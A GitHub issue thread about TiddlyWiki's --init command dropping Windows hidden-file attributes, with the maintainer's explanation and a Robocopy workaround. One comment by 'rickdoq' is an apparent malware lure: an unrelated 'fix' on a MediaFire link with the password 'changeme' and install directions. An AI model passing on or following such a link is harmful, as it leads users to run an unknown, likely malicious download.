### ISSUE TITLE
[BUG] TiddlyWiki Init Does Not Respect the File Attributes

### ISSUE THREAD

**Issue by kookma** [TiddlyWiki/TiddlyWiki5#8576]
### Describe the bug

As discussed here https://talk.tiddlywiki.org/t/tiddlywiki-init-does-not-respect-the-file-attributes/10537/2

When creating a new wikifolder using

```ps
tiddlywiki mywiki --init myedition
```

TiddlyWiki copies the `myedition` into `mywiki`, BUT it does not respect the file attributes.
For example `myedition` folder has two hidden files ( desktop.ini, myfolder.ico these are hidden files, normally used on Windows to customize the appearance of folder and created by Windows), but `mywiki` has the same files with the hidden attribute removed!

### Expected behavior

TiddlyWiki should respect the file attributes and does not change their properties.

### TiddlyWiki Configuration

- TW 5.3.5
- Windows 11
- Node 18

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by Jermolene** [comment]
Hi @kookma I understand the frustration but this would be hard to fix. Hidden files are specific to the Windows platform, and as far as I can tell there is no support for working with them in Node.js.

**Comment by kookma** [comment]
Thank you for clarification. I close the issue as I understand --init will copy the whole edition directory.
So, on Windows 8,10, and 11 this can be addressed using robovopy instead of `tiddlywiki mywiki --init server`


```
Robocopy $editionFullName $wikiName /E /COPY:DAT > $null	
```
